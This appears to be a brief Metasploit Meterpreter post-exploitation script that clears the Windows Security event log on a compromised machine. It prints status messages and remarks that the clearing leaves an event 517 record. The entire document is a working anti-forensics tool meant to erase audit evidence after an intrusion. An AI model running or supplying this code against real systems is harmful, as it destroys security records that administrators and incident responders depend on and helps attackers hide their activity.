# clears the security event log - chris [] learnsecurityonline [] com # # Event 517 is logged whenever the Security log is cleared, REGARDLESS of # the status of the Audit System Events audit policy. print_line("Clearing the Security Event Log, it will leave a 517 event\n") log = client.sys.eventlog.open('security') log.clear print_line("Done... Have a lovely day :-)")